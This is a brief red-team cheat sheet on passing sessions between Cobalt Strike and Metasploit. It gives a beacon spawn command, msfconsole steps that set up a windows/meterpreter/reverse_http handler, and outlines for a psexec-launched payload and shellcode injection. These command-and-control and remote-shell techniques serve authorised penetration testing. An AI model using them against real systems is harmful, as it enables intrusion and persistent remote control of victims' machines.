Session Passing
Session Passing
CASE 1: Beacon Passing (Within Cobalt Strike - Create alternate HTTP beacon while keeping DNS as lifeline)
beacon> spawn x64 httpCASE 2: Foreign Listener (From CS to Metasploit - Staged Payload - only x86 payloads)
Setup Metasploit listener
attacker@ubuntu ~> sudo msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_http
msf6 exploit(multi/handler) > set LHOST ens5
msf6 exploit(multi/handler) > set LPORT 8080
msf6 exploit(multi/handler) > runSetup a Foreign Listener in cobalt strike with above IP & port details
Use Jump psexec to execute the beacon payload and pass the session
CASE 3: Shellcode Injection (From CS to Metasploit - Stageless Payload)
Setup up metasploit
Generate binary
Inject msf shellcode into process memory
Last updated